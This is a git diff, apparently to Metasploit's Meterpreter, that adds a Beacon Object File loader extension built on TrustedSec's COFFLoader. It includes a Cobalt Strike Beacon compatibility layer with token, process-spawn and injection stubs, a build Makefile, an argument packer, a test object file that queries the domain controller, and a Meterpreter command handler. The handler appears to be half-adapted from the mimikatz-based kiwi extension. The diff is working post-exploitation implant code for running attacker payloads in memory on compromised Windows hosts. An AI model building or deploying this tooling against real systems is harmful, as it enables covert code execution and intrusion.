+ +typedef struct coff_reloc +{ + uint32_t VirtualAddress; + uint32_t SymbolTableIndex; + uint16_t Type; +} coff_reloc_t; + +typedef struct coff_sym +{ + union + { + char Name[8]; + uint32_t value[2]; + } first; + uint32_t Value; + uint16_t SectionNumber; + uint16_t Type; + uint8_t StorageClass; + uint8_t NumberOfAuxSymbols; + +} coff_sym_t; + +uint32_t ProtectionFlags[8] = { + PAGE_NOACCESS, // not writeable, not readable, not executable + PAGE_EXECUTE, // not writeable, not readable, executable + PAGE_READONLY, // not writeable, readable, not executable + PAGE_EXECUTE_READ, // not writeable, readable, executable + PAGE_WRITECOPY, // writeable, not readable, not executable + PAGE_EXECUTE_WRITECOPY, // writeable, not readable, executable + PAGE_READWRITE, // writeable, readable, not executable + PAGE_EXECUTE_READWRITE, // writeable, readable, executable +}; + +#pragma pack(pop) +/* AMD64 Specific types */ +#define IMAGE_REL_AMD64_ABSOLUTE 0x0000 +#define IMAGE_REL_AMD64_ADDR64 0x0001 +#define IMAGE_REL_AMD64_ADDR32 0x0002 +#define IMAGE_REL_AMD64_ADDR32NB 0x0003 +/* Most common from the looks of it, just 32-bit relative address from the byte following the relocation */ +#define IMAGE_REL_AMD64_REL32 0x0004 +/* Second most common, 32-bit address without an image base. Not sure what that means... */ +#define IMAGE_REL_AMD64_REL32_1 0x0005 +#define IMAGE_REL_AMD64_REL32_2 0x0006 +#define IMAGE_REL_AMD64_REL32_3 0x0007 +#define IMAGE_REL_AMD64_REL32_4 0x0008 +#define IMAGE_REL_AMD64_REL32_5 0x0009 +#define IMAGE_REL_AMD64_SECTION 0x000A +#define IMAGE_REL_AMD64_SECREL 0x000B +#define IMAGE_REL_AMD64_SECREL7 0x000C +#define IMAGE_REL_AMD64_TOKEN 0x000D +#define IMAGE_REL_AMD64_SREL32 0x000E +#define IMAGE_REL_AMD64_PAIR 0x000F +#define IMAGE_REL_AMD64_SSPAN32 0x0010 + +/*i386 Relocation types */ + +#define IMAGE_REL_I386_ABSOLUTE 0x0000 +#define IMAGE_REL_I386_DIR16 0x0001 +#define IMAGE_REL_I386_REL16 0x0002 +#define IMAGE_REL_I386_DIR32 0x0006 +#define IMAGE_REL_I386_DIR32NB 0x0007 +#define IMAGE_REL_I386_SEG12 0x0009 +#define IMAGE_REL_I386_SECTION 0x000A +#define IMAGE_REL_I386_SECREL 0x000B +#define IMAGE_REL_I386_TOKEN 0x000C +#define IMAGE_REL_I386_SECREL7 0x000D +#define IMAGE_REL_I386_REL32 0x0014 + +/* Section Characteristic Flags */ + +#define IMAGE_SCN_MEM_WRITE 0x80000000 +#define IMAGE_SCN_MEM_READ 0x40000000 +#define IMAGE_SCN_MEM_EXECUTE 0x20000000 +#define IMAGE_SCN_ALIGN_16BYTES 0x00500000 +#define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 +#define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 +#define IMAGE_SCN_MEM_SHARED 0x10000000 +#define IMAGE_SCN_CNT_CODE 0x00000020 +#define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 +#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 + +unsigned char *unhexlify(unsigned char *value, int *outlen); +typedef int (*goCallback)(char *, int); +#ifdef BUILD_DLL +/* DLL export */ +#define EXPORT __declspec(dllexport) +EXPORT int __cdecl LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); +#else +/* EXE import */ +#define EXPORT __declspec(dllimport) +#endif + +int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, unsigned char *argumentdata, int argumentSize, goCallback data); +#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt b/c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt new file mode 100644 index 00000000..be683b36 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt @@ -0,0 +1,25 @@ +Copyright 2020, COFFLoader by TrustedSec, LLC +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer + in the documentation and/or other materials provided with the distribution. + * Neither the name of TrustedSec, LLC nor the names of its contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF +THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +The above licensing was taken from the BSD licensing and is applied to COFFLoader as well. + +Note that the COFFLoader is provided as is, and is a royalty free open-source application. + +Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit +is due (which means giving the authors the credit they deserve for writing it). + diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile b/c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile new file mode 100644 index 00000000..0f78d06e --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile @@ -0,0 +1,36 @@ + +all: bof bof32 +all-dll: dll dll32 +debug: debug32 debug64 + +dll: + x86_64-w64-mingw32-gcc -shared -Wall -DBUILD_DLL dll.c beacon_compatibility.c COFFLoader.c -o COFFLoader.x64.dll + x86_64-w64-mingw32-gcc -c test.c -o test64.out + +dll32: + i686-w64-mingw32-gcc -shared -Wall -DBUILD_DLL dll.c beacon_compatibility.c COFFLoader.c -o COFFLoader.x86.dll + i686-w64-mingw32-gcc -c test.c -o test32.out + +bof: + x86_64-w64-mingw32-gcc -Wall -DCOFF_STANDALONE beacon_compatibility.c COFFLoader.c -o COFFLoader64.exe + x86_64-w64-mingw32-gcc -c test.c -o test64.out + +bof32: + i686-w64-mingw32-gcc -Wall -DCOFF_STANDALONE beacon_compatibility.c COFFLoader.c -o COFFLoader32.exe + i686-w64-mingw32-gcc -c test.c -o test32.out + +debug64: + x86_64-w64-mingw32-gcc -DCOFF_STANDALONE -DDEBUG beacon_compatibility.c COFFLoader.c -o COFFLoader64.exe + x86_64-w64-mingw32-gcc -c test.c -o test64.out + +debug32: + i686-w64-mingw32-gcc -DCOFF_STANDALONE -DDEBUG beacon_compatibility.c COFFLoader.c -o COFFLoader32.exe + i686-w64-mingw32-gcc -c test.c -o test32.out + +nix: + gcc -DCOFF_STANDALONE -Wall -DDEBUG beacon_compatibility.c COFFLoader.c -o COFFLoader.out + +clean: + rm -f COFFLoader64.exe COFFLoader32.exe COFFLoader.out + rm -f test32.out test64.out + rm -f *.dll diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/README.md b/c/meterpreter/source/extensions/bofloader/COFFLoader/README.md new file mode 100644 index 00000000..49c34eaa --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/README.md @@ -0,0 +1,47 @@ +# COFF Loader + +This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it. The only exception is that the injection related beacon compatibility functions are just empty. + +The main goal is to provide a working example and maybe be useful to someone. + + +## Parts +There are a few parts to it they are listed below. + +- beacon_compatibility: This is the beacon internal functions so that you can load BOF files and run them. +- COFFLoader: This is the actual coff loader, and when built for nix just loads the 64 bit object file and parses it. +- test: This is the example "COFF" file, will build to the COFF file for you when make is called. +- beacon_generate: This is a helper script to build strings/arguments compatible with the beacon_compatibility functions. + + +## Beacon Generate +This is used to generate arguments for the COFFLoader code, if the BOF takes arguments simply add the arguments with the type expected with this and generate the hex string for use. + +Example usage here: +``` +COFFLoader % python3 beacon_generate.py +Beacon Argument Generator +Beacon>help + +Documented commands (type help ): +======================================== +addString addWString addint addshort exit generate help reset + +Beacon>addWString test +Beacon>addint 4 +Beacon>generate +b'120000000a0000007400650073007400000004000000' +Beacon>reset +Beacon>addint 5 +Beacon>generate +b'0400000005000000' +Beacon>exit +``` + +## Running +An example of how to run a BOF is below. + +``` +COFFLoader64.exe go test64.out +COFFLoader64.exe go ..\CS-Situational-Awareness-BOF\SA\whoami\whoami.x64.o +``` diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h new file mode 100644 index 00000000..36131597 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h @@ -0,0 +1,61 @@ +/* + * Beacon Object Files (BOF) + * ------------------------- + * A Beacon Object File is a light-weight post exploitation tool that runs + * with Beacon's inline-execute command. + * + * Cobalt Strike 4.1. + */ + +/* data API */ +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} datap; + +DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); +DECLSPEC_IMPORT int BeaconDataInt(datap * parser); +DECLSPEC_IMPORT short BeaconDataShort(datap * parser); +DECLSPEC_IMPORT int BeaconDataLength(datap * parser); +DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); + +/* format API */ +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} formatp; + +DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); +DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); +DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); +DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); +DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); +DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); +DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); + +/* Output Functions */ +#define CALLBACK_OUTPUT 0x0 +#define CALLBACK_OUTPUT_OEM 0x1e +#define CALLBACK_ERROR 0x0d +#define CALLBACK_OUTPUT_UTF8 0x20 + +DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); +DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); + +/* Token Functions */ +DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); +DECLSPEC_IMPORT void BeaconRevertToken(); +DECLSPEC_IMPORT BOOL BeaconIsAdmin(); + +/* Spawn+Inject Functions */ +DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); +DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); +DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); +DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); + +/* Utility Functions */ +DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c new file mode 100644 index 00000000..079b00cf --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c @@ -0,0 +1,351 @@ +/* + * Cobalt Strike 4.X BOF compatibility layer + * ----------------------------------------- + * The whole point of these files are to allow beacon object files built for CS + * to run fine inside of other tools without recompiling. + * + * Built off of the beacon.h file provided to build for CS. + */ +#include +#include +#include +#include +#ifdef _WIN32 +#include + +#include "beacon_compatibility.h" + +#define DEFAULTPROCESSNAME "rundll32.exe" +#ifdef _WIN64 +#define X86PATH "SysWOW64" +#define X64PATH "System32" +#else +#define X86PATH "System32" +#define X64PATH "sysnative" +#endif + + + /* Data Parsing */ +unsigned char* InternalFunctions[29][2] = { + {(unsigned char*)"BeaconDataParse", (unsigned char*)BeaconDataParse}, + {(unsigned char*)"BeaconDataInt", (unsigned char*)BeaconDataInt}, + {(unsigned char*)"BeaconDataShort", (unsigned char*)BeaconDataShort}, + {(unsigned char*)"BeaconDataLength", (unsigned char*)BeaconDataLength}, + {(unsigned char*)"BeaconDataExtract", (unsigned char*)BeaconDataExtract}, + {(unsigned char*)"BeaconFormatAlloc", (unsigned char*)BeaconFormatAlloc}, + {(unsigned char*)"BeaconFormatReset", (unsigned char*)BeaconFormatReset}, + {(unsigned char*)"BeaconFormatFree", (unsigned char*)BeaconFormatFree}, + {(unsigned char*)"BeaconFormatAppend", (unsigned char*)BeaconFormatAppend}, + {(unsigned char*)"BeaconFormatPrintf", (unsigned char*)BeaconFormatPrintf}, + {(unsigned char*)"BeaconFormatToString", (unsigned char*)BeaconFormatToString}, + {(unsigned char*)"BeaconFormatInt", (unsigned char*)BeaconFormatInt}, + {(unsigned char*)"BeaconPrintf", (unsigned char*)BeaconPrintf}, + {(unsigned char*)"BeaconOutput", (unsigned char*)BeaconOutput}, + {(unsigned char*)"BeaconUseToken", (unsigned char*)BeaconUseToken}, + {(unsigned char*)"BeaconRevertToken", (unsigned char*)BeaconRevertToken}, + {(unsigned char*)"BeaconIsAdmin", (unsigned char*)BeaconIsAdmin}, + {(unsigned char*)"BeaconGetSpawnTo", (unsigned char*)BeaconGetSpawnTo}, + {(unsigned char*)"BeaconSpawnTemporaryProcess", (unsigned char*)BeaconSpawnTemporaryProcess}, + {(unsigned char*)"BeaconInjectProcess", (unsigned char*)BeaconInjectProcess}, + {(unsigned char*)"BeaconInjectTemporaryProcess", (unsigned char*)BeaconInjectTemporaryProcess}, + {(unsigned char*)"BeaconCleanupProcess", (unsigned char*)BeaconCleanupProcess}, + {(unsigned char*)"toWideChar", (unsigned char*)toWideChar}, + {(unsigned char*)"LoadLibraryA", (unsigned char*)LoadLibraryA}, + {(unsigned char*)"GetProcAddress", (unsigned char*)GetProcAddress}, + {(unsigned char*)"GetModuleHandleA", (unsigned char*)GetModuleHandleA}, + {(unsigned char*)"FreeLibrary", (unsigned char*)FreeLibrary} +}; + +uint32_t swap_endianess(uint32_t indata) { + uint32_t testint = 0xaabbccdd; + uint32_t outint = indata; + if (((unsigned char*)&testint)[0] == 0xdd) { + ((unsigned char*)&outint)[0] = ((unsigned char*)&indata)[3]; + ((unsigned char*)&outint)[1] = ((unsigned char*)&indata)[2]; + ((unsigned char*)&outint)[2] = ((unsigned char*)&indata)[1]; + ((unsigned char*)&outint)[3] = ((unsigned char*)&indata)[0]; + } + return outint; +} + +char* beacon_compatibility_output = NULL; +int beacon_compatibility_size = 0; +int beacon_compatibility_offset = 0; + +void BeaconDataParse(datap* parser, char* buffer, int size) { + if (parser == NULL) { + return; + } + parser->original = buffer; + parser->buffer = buffer; + parser->length = size - 4; + parser->size = size - 4; + parser->buffer += 4; + return; +} + +int BeaconDataInt(datap* parser) { + int32_t fourbyteint = 0; + if (parser->length < 4) { + return 0; + } + memcpy(&fourbyteint, parser->buffer, 4); + parser->buffer += 4; + parser->length -= 4; + return (int)fourbyteint; +} + +short BeaconDataShort(datap* parser) { + int16_t retvalue = 0; + if (parser->length < 2) { + return 0; + } + memcpy(&retvalue, parser->buffer, 2); + parser->buffer += 2; + parser->length -= 2; + return (short)retvalue; +} + +int BeaconDataLength(datap* parser) { + return parser->length; +} + +char* BeaconDataExtract(datap* parser, int* size) { + uint32_t length = 0; + char* outdata = NULL; + /*Length prefixed binary blob, going to assume uint32_t for this.*/ + if (parser->length < 4) { + return NULL; + } + memcpy(&length, parser->buffer, 4); + parser->buffer += 4; + + outdata = parser->buffer; + if (outdata == NULL) { + return NULL; + } + parser->length -= 4; + parser->length -= length; + parser->buffer += length; + if (size != NULL && outdata != NULL) { + *size = length; + } + return outdata; +} + +/* format API */ + +void BeaconFormatAlloc(formatp* format, int maxsz) { + if (format == NULL) { + return; + } + format->original = calloc(maxsz, 1); + format->buffer = format->original; + format->length = 0; + format->size = maxsz; + return; +} + +void BeaconFormatReset(formatp* format) { + memset(format->original, 0, format->size); + format->buffer = format->original; + format->length = format->size; + return; +} + +void BeaconFormatFree(formatp* format) { + if (format == NULL) { + return; + } + if (format->original) { + free(format->original); + format->original = NULL; + } + format->buffer = NULL; + format->length = 0; + format->size = 0; + return; +} + +void BeaconFormatAppend(formatp* format, char* text, int len) { + memcpy(format->buffer, text, len); + format->buffer += len; + format->length += len; + return; +} + +void BeaconFormatPrintf(formatp* format, char* fmt, ...) { + /*Take format string, and sprintf it into here*/ + va_list args; + int length = 0; + + va_start(args, fmt); + length = vsnprintf(NULL, 0, fmt, args); + va_end(args); + if (format->length + length > format->size) { + return; + } + + va_start(args, fmt); + (void)vsnprintf(format->buffer, length, fmt, args); + va_end(args); + format->length += length; + format->buffer += length; + return; +} + + +char* BeaconFormatToString(formatp* format, int* size) { + *size = format->length; + return format->original; +} + +void BeaconFormatInt(formatp* format, int value) { + uint32_t indata = value; + uint32_t outdata = 0; + if (format->length + 4 > format->size) { + return; + } + outdata = swap_endianess(indata); + memcpy(format->buffer, &outdata, 4); + format->length += 4; + format->buffer += 4; + return; +} + +/* Main output functions */ + +void BeaconPrintf(int type, char* fmt, ...) { + /* Change to maintain internal buffer, and return after done running. */ + int length = 0; + char* tempptr = NULL; + va_list args; + va_start(args, fmt); + vprintf(fmt, args); + va_end(args); + + va_start(args, fmt); + length = vsnprintf(NULL, 0, fmt, args); + va_end(args); + tempptr = realloc(beacon_compatibility_output, beacon_compatibility_size + length + 1); + if (tempptr == NULL) { + return; + } + beacon_compatibility_output = tempptr; + memset(beacon_compatibility_output + beacon_compatibility_offset, 0, length + 1); + va_start(args, fmt); + length = vsnprintf(beacon_compatibility_output + beacon_compatibility_offset, length +1, fmt, args); + beacon_compatibility_size += length; + beacon_compatibility_offset += length; + va_end(args); + return; +} + +void BeaconOutput(int type, char* data, int len) { + char* tempptr = NULL; + tempptr = realloc(beacon_compatibility_output, beacon_compatibility_size + len + 1); + beacon_compatibility_output = tempptr; + if (tempptr == NULL) { + return; + } + memset(beacon_compatibility_output + beacon_compatibility_offset, 0, len + 1); + memcpy(beacon_compatibility_output + beacon_compatibility_offset, data, len); + beacon_compatibility_size += len; + beacon_compatibility_offset += len; + return; +} + +/* Token Functions */ + +BOOL BeaconUseToken(HANDLE token) { + /* Probably needs to handle DuplicateTokenEx too */ + SetThreadToken(NULL, token); + return TRUE; +} + +void BeaconRevertToken(void) { + if (!RevertToSelf()) { +#ifdef DEBUG + printf("RevertToSelf Failed!\n"); +#endif + } + return; +} + +BOOL BeaconIsAdmin(void) { + /* Leaving this to be implemented by people needing it */ +#ifdef DEBUG + printf("BeaconIsAdmin Called\n"); +#endif + return FALSE; +} + +/* Injection/spawning related stuffs + * + * These functions are basic place holders, and if implemented into something + * real should be just calling internal functions for your tools. */ +void BeaconGetSpawnTo(BOOL x86, char* buffer, int length) { + char* tempBufferPath = NULL; + if (buffer == NULL) { + return; + } + if (x86) { + tempBufferPath = "C:\\Windows\\"X86PATH"\\"DEFAULTPROCESSNAME; + if (strlen(tempBufferPath) > length) { + return; + } + memcpy(buffer, tempBufferPath, strlen(tempBufferPath)); + } + else { + tempBufferPath = "C:\\Windows\\"X64PATH"\\"DEFAULTPROCESSNAME; + if (strlen(tempBufferPath) > length) { + return; + } + memcpy(buffer, tempBufferPath, strlen(tempBufferPath)); + + } + return; +} + +BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo) { + BOOL bSuccess = FALSE; + if (x86) { + bSuccess = CreateProcessA(NULL, (char*)"C:\\Windows\\"X86PATH"\\"DEFAULTPROCESSNAME, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, sInfo, pInfo); + } + else { + bSuccess = CreateProcessA(NULL, (char*)"C:\\Windows\\"X64PATH"\\"DEFAULTPROCESSNAME, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, sInfo, pInfo); + } + return bSuccess; +} + +void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char * arg, int a_len) { + /* Leaving this to be implemented by people needing/wanting it */ + return; +} + +void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len) { + /* Leaving this to be implemented by people needing/wanting it */ + return; +} + +void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo) { + (void)CloseHandle(pInfo->hThread); + (void)CloseHandle(pInfo->hProcess); + return; +} + +BOOL toWideChar(char* src, wchar_t* dst, int max) { + /* Leaving this to be implemented by people needing/wanting it */ + return FALSE; +} + +char* BeaconGetOutputData(int *outsize) { + char* outdata = beacon_compatibility_output; + *outsize = beacon_compatibility_size; + beacon_compatibility_output = NULL; + beacon_compatibility_size = 0; + beacon_compatibility_offset = 0; + return outdata; +} + +#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h new file mode 100644 index 00000000..e1681273 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h @@ -0,0 +1,66 @@ +/* + * Cobalt Strike 4.X BOF compatibility layer + * ----------------------------------------- + * The whole point of these files are to allow beacon object files built for CS + * to run fine inside of other tools without recompiling. + * + * Built off of the beacon.h file provided to build for CS. + */ +#ifndef BEACON_COMPATIBILITY_H_ + /* Structures as is in beacon.h */ +extern unsigned char* InternalFunctions[29][2]; +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} datap; + +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} formatp; + +void BeaconDataParse(datap * parser, char * buffer, int size); +int BeaconDataInt(datap * parser); +short BeaconDataShort(datap * parser); +int BeaconDataLength(datap * parser); +char * BeaconDataExtract(datap * parser, int * size); + +void BeaconFormatAlloc(formatp * format, int maxsz); +void BeaconFormatReset(formatp * format); +void BeaconFormatFree(formatp * format); +void BeaconFormatAppend(formatp * format, char * text, int len); +void BeaconFormatPrintf(formatp * format, char * fmt, ...); +char * BeaconFormatToString(formatp * format, int * size); +void BeaconFormatInt(formatp * format, int value); + +#define CALLBACK_OUTPUT 0x0 +#define CALLBACK_OUTPUT_OEM 0x1e +#define CALLBACK_ERROR 0x0d +#define CALLBACK_OUTPUT_UTF8 0x20 + + +void BeaconPrintf(int type, char * fmt, ...); +void BeaconOutput(int type, char * data, int len); + +/* Token Functions */ +BOOL BeaconUseToken(HANDLE token); +void BeaconRevertToken(); +BOOL BeaconIsAdmin(); + +/* Spawn+Inject Functions */ +void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); +BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); +void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); +void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); +void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); + +/* Utility Functions */ +BOOL toWideChar(char * src, wchar_t * dst, int max); +uint32_t swap_endianess(uint32_t indata); + +char* BeaconGetOutputData(int *outsize); +#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py new file mode 100644 index 00000000..cb658935 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py @@ -0,0 +1,96 @@ +from struct import pack, calcsize +import binascii +import cmd + +class BeaconPack: + def __init__(self): + self.buffer = b'' + self.size = 0 + + def getbuffer(self): + return pack(" +#include + +//extern "C" BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD Reason, LPVOID LPV) { +//This one was only necessary if you were using a C++ compiler + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) +{ + + switch (fdwReason) + { + case DLL_PROCESS_ATTACH: + // Code to run when the DLL is loaded + break; + + case DLL_PROCESS_DETACH: + // Code to run when the DLL is freed + break; + + case DLL_THREAD_ATTACH: + // Code to run when a thread is created during the DLL's lifetime + break; + + case DLL_THREAD_DETACH: + // Code to run when a thread ends normally. + break; + } + + return TRUE; +} \ No newline at end of file diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json b/c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json new file mode 100644 index 00000000..78c9f8fd --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json @@ -0,0 +1,22 @@ +{ + "name": "COFF Loader", + "command_name": "coff-loader", + "version": "0.0.0", + "extension_author": "lesnuages", + "original_author": "TrustedSec", + "repo_url": "https://github.com/sliverarmory/COFFLoader", + "help": "Load and execute Beacon Object Files (BOFs) in memory.", + "entrypoint": "LoadAndRun", + "files": [ + { + "os": "windows", + "arch": "386", + "path": "COFFLoader.x86.dll" + }, + { + "os": "windows", + "arch": "amd64", + "path": "COFFLoader.x64.dll" + } + ] +} \ No newline at end of file diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/test.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/test.c new file mode 100644 index 00000000..8547d315 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/test.c @@ -0,0 +1,44 @@ +#include +#include +#include +#include +#include "beacon.h" + +DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); +DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); +WINBASEAPI int __cdecl MSVCRT$printf(const char * __restrict__ _Format,...); + +char* TestGlobalString = "This is a global string"; +/* Can't do stuff like "int testvalue;" in a coff file, because it assumes that + * the symbol is like any function, so you would need to allocate a section of bss + * (without knowing the size of it), and then resolve the symbol to that. So safer + * to just not support that */ +int testvalue = 0; + +int test(void){ + MSVCRT$printf("Test String from test\n"); + testvalue = 1; + return 0; +} + +int test2(void){ + MSVCRT$printf("Test String from test2\n"); + return 0; +} + + +void go(char * args, unsigned long alen) { + DWORD dwRet; + PDOMAIN_CONTROLLER_INFO pdcInfo; + BeaconPrintf(1, "This GlobalString \"%s\"\n", TestGlobalString); + MSVCRT$printf("Test Value: %d\n", testvalue); + (void)test(); + MSVCRT$printf("Test ValueBack: %d\n", testvalue); + (void)test2(); + dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo); + if (ERROR_SUCCESS == dwRet) { + MSVCRT$printf("%s", pdcInfo->DomainName); + } + + NETAPI32$NetApiBufferFree(pdcInfo); +} diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c new file mode 100644 index 00000000..61a10053 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -0,0 +1,122 @@ +/*! + * @file main.c + * @brief Entry point for the kiwi extension. + */ + +#include "common.h" +#include "common_metapi.h" + +// Required so that use of the API works. +MetApi* met_api = NULL; + +#define RDIDLL_NOEXPORT +#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + +#include "main.h" + +extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); + +DWORD request_exec_cmd(Remote *remote, Packet *packet); +//DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet); + +/*! @brief The enabled commands for this extension. */ +Command customCommands[] = +{ + COMMAND_REQ(COMMAND_ID_BOFLOADER_EXEC_CMD, request_exec_cmd), + COMMAND_TERMINATOR +}; + +/*! + * @brief Handler for the generic command execution function. + * @param remote Pointer to the \c Remote instance. + * @param packet Pointer to the incoming packet. + * @returns \c ERROR_SUCCESS + */ +DWORD request_exec_cmd(Remote *remote, Packet *packet) +{ + DWORD result = ERROR_SUCCESS; + Packet * response = met_api->packet.create_response(packet); + + wchar_t* cmd = met_api->packet.get_tlv_value_wstring(packet, TLV_TYPE_BOFLOADER_CMD); + if (cmd != NULL) + { + dprintf("[BOF] Executing command: %S", cmd); + + // While this implies that powershell is in use, this is just a naming thing, + // it's not actually using powershell. + wchar_t* output = powershell_reflective_mimikatz(cmd); + dprintf("[BOF] Executed command: %S", cmd); + if (output != NULL) + { + met_api->packet.add_tlv_wstring(response, TLV_TYPE_KIWI_CMD_RESULT, output); + } + else + { + result = ERROR_OUTOFMEMORY; + } + //LocalFree(cmd); + } + else + { + result = ERROR_INVALID_PARAMETER; + } + + dprintf("[KIWI] Dumped, transmitting response."); + met_api->packet.transmit_response(result, remote, response); + dprintf("[KIWI] Done."); + + return ERROR_SUCCESS; +} + +/*! + * @brief Initialize the server extension. + * @param api Pointer to the Meterpreter API structure. + * @param remote Pointer to the remote instance. + * @return Indication of success or failure. + */ 